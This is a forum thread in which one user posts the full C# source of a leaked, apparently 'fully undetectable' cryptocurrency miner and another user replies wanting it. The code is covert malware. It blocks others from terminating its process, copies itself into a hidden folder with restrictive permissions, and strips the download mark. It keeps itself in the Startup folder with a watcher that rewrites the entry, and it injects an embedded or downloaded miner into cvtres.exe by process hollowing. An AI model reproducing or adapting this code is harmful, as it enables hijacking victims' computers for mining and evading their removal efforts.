goldregister Posted February 17, 2014 Share Posted February 17, 2014 (edited) This is the hidden content, please Sign In or Sign Up [LENGUAJE=C#]#define STARTUP1 #define PROCESSPROTECTION #define MINERPERSISTANCE #define STARTUPPERSISTANCE #define LOCALMINER using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Reflection; using System.Resources; using System.Runtime.InteropServices; using System.Security.AccessControl; using System.Security.Cryptography; using System.Security.Principal; using System.Text; using System.Threading; namespace oqlark { public class nwlimwlo { public nwlimwlo() { bool outMutex; Mutex mtx = new Mutex(true, "pogbbqkf", out outMutex); if (!outMutex) { Environment.Exit(0); } GC.KeepAlive(mtx); #if (PROCESSPROTECTION) phfebu.hvpud(Process.GetCurrentProcess().Id); #endif #if (STARTUP1) xjidzwc.tqa(); #endif xdqujdirs options = new xdqujdirs(); options.qecqqq = bool.Parse("False"); options.utr = wazjze.erwreauva; options.boq = "http://www.pool.com"; options.tuxf = int.Parse("1234"); options.axqsw = "username"; options.fyln = bool.Parse("True"); options.uhpzpgjfu = "password"; options.sic = int.Parse("-1"); options.tab = bool.Parse("False"); options.bket = "127.0.0.1"; options.lvkoihql = int.Parse("1234"); options.vzff = zvbet.http; cbd.wgjsmthh(options); Process.GetCurrentProcess().WaitForExit(); } #if(PROCESSPROTECTION || STARTUP1) private static class phfebu { #if(PROCESSPROTECTION) public static void hvpud(int ukyuqv) { //Console.WriteLine("Setted Process Permission"); try { IntPtr processHandle = Process.GetProcessById(ukyuqv).Handle; const int dal_SECURITY_INFORMATION = 0x4; byte[] buff = new byte[0]; uint setblock = 0; pdkz.GetKernelObjectSecurity(processHandle, dal_SECURITY_INFORMATION, buff, 0, ref setblock); if (!(setblock < 0 || setblock > short.MaxValue)) { buff = new byte[setblock]; if (pdkz.GetKernelObjectSecurity(processHandle, dal_SECURITY_INFORMATION, buff, setblock, ref setblock)) { RawSecurityDescriptor rsd = new RawSecurityDescriptor(buff, 0); rsd.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, Convert.ToInt32(pdkz.ktevv | pdkz.kfzvptxku | pdkz.yfryx | pdkz.cfx), new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null)); byte[] rawsd = new byte[rsd.BinaryLength]; rsd.GetBinaryForm(rawsd, 0); if (pdkz.SetKernelObjectSecurity(processHandle, dal_SECURITY_INFORMATION, rawsd)) { return; } } } } catch(Exception ex) { //Console.WriteLine(ex.Message); } } #endif #if (STARTUP1) public static void cpavk(string dir) { //Console.WriteLine("Setted Directory Permissions"); try { string cUser = System.Security.Principal.WindowsIdentity.GetCurrent().Name; FileSystemAccessRule rule1 = new FileSystemAccessRule("Administrators", FileSystemRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Allow); FileSystemAccessRule rule2 = new FileSystemAccessRule(cUser, FileSystemRights.Delete | FileSystemRights.DeleteSubdirectoriesAndFiles | FileSystemRights.ChangePermissions | FileSystemRights.TakeOwnership, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Deny); FileSystemAccessRule rule3 = new FileSystemAccessRule(cUser, FileSystemRights.ReadAndExecute | FileSystemRights.Write, InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Allow); DirectorySecurity dSec = new DirectorySecurity(); dSec.AddAccessRule(rule1); dSec.AddAccessRule(rule3); dSec.AddAccessRule(rule2); if (Directory.Exists(dir)) { Directory.SetAccessControl(dir, dSec); } else { Directory.CreateDirectory(dir, dSec); } //return true; } catch { //return false; } } public static void zohljuhzb(string akr) { //Console.WriteLine("Deleted Zone.Identifier"); Process cmd = new Process(); cmd.StartInfo.FileName = "cmd.exe"; cmd.StartInfo.CreateNoWindow = true; cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd.StartInfo.Arguments = string.Format("/c type nul > " + Convert.ToChar(34) + "{0}:Zone.Identifier" + Convert.ToChar(34), akr); cmd.Start(); } public static string ozmtfe(string bpsy) { //Console.WriteLine("Created StartUP Key"); StringBuilder sb = new StringBuilder(); sb.Append("[internetShortcut]\r\n"); sb.AppendFormat("URL=file:///{0}\r\n", bpsy); sb.Append("IconIndex=0\r\n"); sb.AppendFormat("IconFile={0}\r\n", bpsy.Replace(@"\", "/")); return sb.ToString(); } #endif } #endif private static class pdkz { [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CreateProcessA(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, byte[] lpStartupInfo, int[] lpProcessInfo); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("ntdll.dll", SetLastError = true)] public static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress); [DllImport("ntdll.dll", SetLastError = true)] public static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten); [DllImport("ntdll.dll", SetLastError = true)] public static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext); [DllImport("ntdll.dll", SetLastError = true)] public static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext); [DllImport("ntdll.dll", SetLastError = true)] public static extern uint NtResumeThread(IntPtr hThread, IntPtr suspendCount); #if(PROCESSPROTECTION) [DllImport("advapi32.dll")] public static extern bool SetKernelObjectSecurity(IntPtr handle, int securityInformation, byte[] pSecurityDescriptor); [DllImport("advapi32.dll")] public static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out()]byte[] pSecurityDescriptor, uint nLength, ref uint lpnLengthNeeded); public const uint ktevv = 0x1; public const uint kfzvptxku = 0x8; public const uint cfx = 0x100; public const uint yfryx = 0x40000; #endif #if(GPUIDLE) [DllImport("User32.dll")] public static extern bool GetLastInputInfo(ref xuefeo plii); public struct xuefeo { public uint geg; public uint yjeuv; } #endif } #if (STARTUP1) private static class xjidzwc { private static readonly string ymoiec = typeof(xjidzwc).GUID.ToString("B") + @"\" + typeof(xjidzwc).GUID.ToString("N"); private static readonly string xhcq = "StartupProcessName.exe"; public static void tqa() { //Console.WriteLine("Install Called!"); try { string finalPath = Path.Combine( Path.Combine( Environment.GetFolderPath( /*INSTALLDIR*/Environment.SpecialFolder.CommonApplicationData), ymoiec), xhcq); if (finalPath != Process.GetCurrentProcess().MainModule.FileName) { phfebu.cpavk(Path.GetDirectoryName(finalPath)); File.Copy(Process.GetCurrentProcess().MainModule.FileName, finalPath, true); phfebu.zohljuhzb(finalPath); string startupPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), "Shell" + ".url"); try { File.Delete(startupPath); } catch { } File.WriteAllText(startupPath, phfebu.ozmtfe(finalPath)); Process p = Process.Start(finalPath); if (p != null) { #if(PROCESSPROTECTION) phfebu.hvpud(p.Id); #endif Environment.Exit(0); } } else { #if(STARTUPPERSISTANCE) //Console.WriteLine("Installed"); FileSystemWatcher fsw = new FileSystemWatcher(Environment.GetFolderPath(Environment.SpecialFolder.Startup), "*.url"); fsw.Deleted += qgovdvt; fsw.Created += qgovdvt; fsw.Renamed += qgovdvt; fsw.EnableRaisingEvents = true; //Console.WriteLine("Started Persistance"); #endif } } catch { //Console.WriteLine("Error in Installation"); } } #if(STARTUPPERSISTANCE) private static void qgovdvt(object dpuopkx, FileSystemEventArgs bsgcoxzdb) { string finalPath = Path.Combine( Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), ymoiec), xhcq); string startupPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), "Shell" + ".url"); try { File.Delete(startupPath); } catch { } try { File.Delete(bsgcoxzdb.FullPath); } catch { } do { File.WriteAllText(startupPath, phfebu.ozmtfe(finalPath)); } while (!File.Exists(startupPath)); } #endif } #endif private static class cbd { private static bool ctxfo(out uint rixfs) { #if(GPUIDLE) pdkz.xuefeo lastInput = new pdkz.xuefeo(); lastInput.geg = (uint)Marshal.SizeOf(lastInput); if (pdkz.GetLastInputInfo(ref lastInput)) { rixfs = (uint)Environment.TickCount - lastInput.yjeuv; return true; } rixfs = 0; return false; #endif rixfs = 300001; return true; } private static ctrnktnf bky = null; public static void wgjsmthh(xdqujdirs tgk) { try { byte[] minerb = new byte[0]; #if(LOCALMINER) try { ResourceManager res = new ResourceManager("butnijzqnndunquowlvvouzskh", Assembly.GetExecutingAssembly()); minerb = (byte[]) res.GetObject("ukcafnlhnw"); minerb = tvvkq(minerb); } catch (Exception ex) { //Console.WriteLine(ex.Message); return; } #endif #if(ONLINEMINER) try { download: string minerStored = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), Path.Combine(typeof (cbd).GUID.ToString("N"), typeof (cbd).GUID.ToString("N") + ".dat")); if (!File.Exists(minerStored)) { minerb = new WebClient().DownloadData("%MINERURL%"); try { Directory.CreateDirectory(Path.GetDirectoryName(minerStored)); } catch { } File.WriteAllBytes(minerStored, umlzccfs(minerb, "avpafylklqlwtvazalgsyekbnqrfgkwapxfgwmqvtd")); } else { minerb = File.ReadAllBytes(minerStored); minerb = ruheptgct(minerb, "avpafylklqlwtvazalgsyekbnqrfgkwapxfgwmqvtd"); if (minerb == null) { goto download; } } minerb = tvvkq(minerb); } catch { return; } #endif if (tgk.fyln) { new Thread(new ThreadStart(delegate { ctrnktnf gpuMiner = new ctrnktnf(tgk, minerb, true); do { uint time = 0; if (ctxfo(out time)) { if (time > 300000) { if (!gpuMiner.xcre) { //Console.WriteLine("GPU Miner Started"); gpuMiner.ekgz(); } } else { if (gpuMiner.xcre) { gpuMiner.wxwu(); //Console.WriteLine("GPU Miner Stopped"); } } } Thread.Sleep(3000); } while (true); })).Start(); } bky = new ctrnktnf(tgk, minerb, false); bky.ekgz(); #if(MINERPERSISTANCE) bky.mizpnidd.Exited += wktev; #endif //Console.WriteLine("Miner Started!"); } catch { //Console.WriteLine("Error!"); } } #if(MINERPERSISTANCE) static void wktev(object sender, EventArgs e) { bky.ekgz(); bky.mizpnidd.Exited += wktev; //Console.WriteLine("Miner Restarted!"); } #endif private static byte[] tvvkq(byte[] nwogjbjv) { int uncosize = BitConverter.ToInt32(nwogjbjv, nwogjbjv.Length - 4); System.IO.MemoryStream ms = new System.IO.MemoryStream(nwogjbjv); System.IO.Compression.GZipStream sr = new System.IO.Compression.GZipStream(ms, System.IO.Compression.CompressionMode.Decompress); nwogjbjv = new byte[uncosize + 1]; int rByte = sr.Read(nwogjbjv, 0, nwogjbjv.Length); sr.Close(); ms.Close(); sr.Dispose(); ms.Dispose(); return nwogjbjv; } #if(ONLINEMINER) private static byte[] umlzccfs(byte[] pkbv, string jjovcq) { try { MemoryStream ms = new MemoryStream(); TripleDES tdes = TripleDES.Create(); tdes.Key = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(jjovcq)); byte[] iv = new byte[8]; Buffer.BlockCopy(tdes.Key, 0, iv, 0, iv.Length); tdes.IV = iv; CryptoStream cs = new CryptoStream(ms, tdes.CreateEncryptor(), CryptoStreamMode.Write); cs.Write(pkbv, 0, pkbv.Length); cs.Close(); byte[] ct = ms.ToArray(); return ct; } catch { return null; } } private static byte[] ruheptgct(byte[] pkbv, string jjovcq) { try { MemoryStream ms = new MemoryStream(); TripleDES tdes = TripleDES.Create(); tdes.Key = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(jjovcq)); byte[] iv = new byte[8]; Buffer.BlockCopy(tdes.Key, 0, iv, 0, iv.Length); tdes.IV = iv; CryptoStream cs = new CryptoStream(ms, tdes.CreateDecryptor(), CryptoStreamMode.Write); cs.Write(pkbv, 0, pkbv.Length); cs.Close(); byte[] ct = ms.ToArray(); return ct; } catch { return null; } } #endif } private class xdqujdirs { public string boq; public string axqsw; public string uhpzpgjfu; public int tuxf; public wazjze utr; public bool fyln; public bool qecqqq; public int sic; public bool tab; public string bket; public int lvkoihql; public zvbet vzff; public string twncnbcz() { return string.Format("-o {0}:{1} -u {2} -p {3} -a {4} {5}", this.boq, this.tuxf, this.axqsw, this.uhpzpgjfu, this.utr == wazjze.hqfyj ? "scrypt" : "sha256", tab ? string.Format("-x {2}={0}:{1}", bket, lvkoihql, vzff.ToString().ToLower()) : ""); } } private enum wazjze { erwreauva, hqfyj } private enum zvbet { http, socks } private class ctrnktnf { public bool hxpc; private int shexvfh; private readonly byte[] iftindovf; public bool xcre; public Process mizpnidd; private readonly int mkbi; private readonly xdqujdirs tdu; public ctrnktnf(xdqujdirs nbnbom, byte[] zbm, [Optional] bool lbeybzsrz) { if (lbeybzsrz) { hxpc = nbnbom.fyln; mkbi = -1; } else { hxpc = false; mkbi = nbnbom.sic; } tdu = nbnbom; shexvfh = -1; iftindovf = zbm; } public void ekgz() { string commandLine = tdu.twncnbcz() + " -g " + (hxpc ? "yes" : "no"); if (!hxpc) { commandLine += (mkbi == -1 ? "" : mkbi == 0 ? " -t " + ((int)(Environment.ProcessorCount / 2)).ToString() : " -t " + mkbi); } shexvfh = cipwxlo.elom(iftindovf, RuntimeEnvironment.GetRuntimeDirectory() + "cvtres.exe", commandLine, tdu.qecqqq); if (shexvfh != -1) { mizpnidd = Process.GetProcessById(shexvfh); mizpnidd.EnableRaisingEvents = true; #if(PROCESSPROTECTION) if (!hxpc) { phfebu.hvpud(shexvfh); } #endif xcre = true; } } public void wxwu() { if (shexvfh != -1 && xcre) { mizpnidd.EnableRaisingEvents = false; Process.GetProcessById(shexvfh).Kill(); xcre = false; } } } private static class cipwxlo { public static int elom(byte[] hbmaxk, string hilylro, [Optional]string pcb, [Optional]bool cqcmhxd) { byte[] IMAGE_SECTION_HEADER = new byte[0x28]; // pish byte[] IMAGE_NT_HEADERS = new byte[0xf8]; // pinh byte[] IMAGE_DOS_HEADER = new byte[0x40]; // pidh int[] PROCESS_INFO = new int[0x4]; // pi byte[] CONTEXT = new byte[0x2cc]; // ctx // Set the flag. // *(uint*)(ctx + 0x0 /* ContextFlags */) = ipzpgtmvy; Buffer.BlockCopy(BitConverter.GetBytes(ipzpgtmvy), 0, CONTEXT, 0, 4); // Get the DOS header of the EXE. Buffer.BlockCopy(hbmaxk, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length); /* Sanity check: See if we have MZ header. */ /*if (*(ushort*)(pidh + 0x0) != vsset) return false; */ if (BitConverter.ToUInt16(IMAGE_DOS_HEADER, 0) != vsset) return -1; // var e_lfanew = *(int*)(pidh + 0x3c); int e_lfanew = BitConverter.ToInt32(IMAGE_DOS_HEADER, 0x3c); // Get the NT header of the EXE. Buffer.BlockCopy(hbmaxk, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length); /* Sanity check: See if we have PE00 header. */ /*if (*(uint*)(pinh + 0x0) != jaq) return false;*/ if (BitConverter.ToUInt32(IMAGE_NT_HEADERS, 0) != jaq) return -1; // Run with parameters if necessary. if (!string.IsNullOrEmpty(pcb)) hilylro += " " + pcb; if (!pdkz.CreateProcessA(null, hilylro, IntPtr.Zero, IntPtr.Zero, false, blff | (uint)(cqcmhxd ? 0x00000010 : 0x08000000), IntPtr.Zero, null, new byte[0x44], PROCESS_INFO)) return -1; //var ImageBase = new IntPtr(*(int*)(pinh + 0x34)); IntPtr ImageBase = new IntPtr(BitConverter.ToInt32(IMAGE_NT_HEADERS, 0x34)); pdkz.NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase); if ( pdkz.VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, BitConverter.ToUInt32(IMAGE_NT_HEADERS, 0x50) /*(uint*)(pinh + 0x50 /* SizeOfImage */, cdhstzm | uvfrye, edumjr) == IntPtr.Zero) { Process.GetProcessById(PROCESS_INFO[2]).Kill(); elom(hbmaxk, hilylro, pcb, cqcmhxd); // Memory allocation failed; try again (this can happen in low memory situations) } pdkz.NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, Marshal.UnsafeAddrOfPinnedArrayElement(hbmaxk, 0), BitConverter.ToUInt32(IMAGE_NT_HEADERS, 84)/**(uint*)(pinh + 84 /* SizeOfHeaders */, IntPtr.Zero); // for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++) for (ushort i = 0; i < BitConverter.ToUInt16(IMAGE_NT_HEADERS, 0x6)/**(ushort*)(pinh + 0x6 /* NumberOfSections */; i++) { Buffer.BlockCopy(hbmaxk, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length); //fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)]) IntPtr ptp = Marshal.UnsafeAddrOfPinnedArrayElement(hbmaxk, (int)BitConverter.ToUInt32(IMAGE_SECTION_HEADER, 0x14)); pdkz.NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + BitConverter.ToUInt32(IMAGE_SECTION_HEADER, 0xc) /**(uint*)(pish + 0xc /* VirtualAddress */), ptp, BitConverter.ToUInt32(IMAGE_SECTION_HEADER, 0x10)/**(uint*)(pish + 0x10 /* SizeOfRawData */, IntPtr.Zero); } pdkz.NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, Marshal.UnsafeAddrOfPinnedArrayElement(CONTEXT, 0)); pdkz.NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)(Marshal.UnsafeAddrOfPinnedArrayElement(CONTEXT, 0).ToInt32() + 0xAC), ImageBase, 0x4, IntPtr.Zero); Marshal.Copy(BitConverter.GetBytes((uint)ImageBase + BitConverter.ToUInt32(IMAGE_NT_HEADERS, 0x28)), 0, (IntPtr)(Marshal.UnsafeAddrOfPinnedArrayElement(CONTEXT, 0).ToInt32() + 0xB0), 4); pdkz.NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, Marshal.UnsafeAddrOfPinnedArrayElement(CONTEXT, 0)); pdkz.NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero); return PROCESS_INFO[2]; } #region WinNT Definitions private const uint ipzpgtmvy = 0x10007; private const int blff = 0x4; private const int cdhstzm = 0x1000; private const int uvfrye = 0x2000; private const int edumjr = 0x40; private const ushort vsset = 0x5A4D; // MZ private const uint jaq = 0x00004550; // PE00 #endregion } }[/LENGUAJE] Edited February 17, 2014 by goldregister Link to comment Share on other sites More sharing options...
Sayco Posted March 14, 2014 Share Posted March 14, 2014 Re: Leak DeadCow Miner Source Code [LTC&BTC] [FUD] [PERSISTANCE] [sTARTUP] i need this one, hope it will work :) Link to comment Share on other sites More sharing options...
Recommended Posts